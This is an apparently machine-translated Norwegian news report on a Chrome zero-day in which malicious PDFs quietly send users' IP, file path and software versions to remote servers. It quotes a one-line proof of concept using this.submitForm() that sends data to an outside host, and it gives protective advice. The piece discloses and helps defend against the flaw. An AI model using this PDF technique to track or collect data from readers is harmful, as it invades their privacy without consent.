Utnytt deteksjonstjeneste EdgeSpot oppdaget et spennende Chrome-dagers sårbarhet som utnyttet PDF-dokumenter. Sårbarheten lar angripere høste sensitive data ved å bruke skadelige PDF-dokumenter som er åpnet i Chrome.

Så snart offeret åpner de respektive PDF-filene i Google Chrome, begynner et skadelig program å fungere i bakgrunnen ved å samle inn brukerdata.

Dataene blir deretter videresendt til den eksterne serveren som blir kontrollert av hackerne. Du lurer kanskje på hvilke data som blir sugd av angriperne, de målretter følgende data på PCen din:

• IP adresse
• Full bane for PDF-filen på systemet
• OS- og Chrome-versjoner

Pass på skadelige PDF-filer

Du kan bli overrasket over å vite at ingenting skjer når Adobe Reader brukes til å åpne PDF-filer. I tillegg brukes HTTP POST-forespørsler for å overføre data til eksterne servere uten brukerintervensjon.

Eksperter oppdaget at ett av de to domenene readnotifycom eller burpcollaboratornet mottok dataene.

Du kan forestille deg intensiteten av angrepet ved å vurdere det faktum at det meste av antivirusprogramvaren ikke er i stand til å oppdage prøvene som er oppdaget av EdgeSpot.

Eksperter avslører at angriperne bruker “this.submitForm ()” PDF Javascript API for å samle inn sensitiv informasjon fra brukerne.

Vi testet det med en minimal PoC, en enkel API-samtale som “this.submitForm ('http://google.com/test')" vil gjøre at Google Chrome sender personopplysningene til google.com.

Ekspertene fant faktisk ut at denne Chrome-feilen ble utnyttet av to forskjellige sett med ondsinnede PDF-filer. Begge ble sirkulert i henholdsvis oktober 2017 og september 2018.

Spesielt kan de innsamlede dataene brukes av angriperne til å finjustere angrep i fremtiden. Rapporter antyder at den første batch med filer ble satt sammen ved hjelp av ReadNotifys PDF-sporingstjeneste.

Brukere kan bruke tjenesten for å holde oversikt over brukervisninger. EdgeSpot har ikke delt noen detaljer angående arten av det andre settet med PDF-filer.

Slik holder du deg beskyttet

Exploit-gjenkjenningstjenesten EdgeSpot ønsket å varsle Chrome-brukerne om potensielle risikoer, fordi lappen ikke forventes å bli utgitt i løpet av nær fremtid.

EdgeSpot rapporterte til Google om sårbarheten i fjor, og selskapet lovet å gi ut en lapp i slutten av april. H

Du kan imidlertid vurdere å bruke en midlertidig løsning på problemet ved å lokalt se de mottatte PDF-dokumentene ved å bruke en alternativ PDF-leser-app.

Alternativt kan du også åpne PDF-dokumentene dine i Chrome ved å koble systemene dine fra Internett. I mellomtiden kan du vente til Chrome 74-oppdateringen som forventes rullet ut 23. april.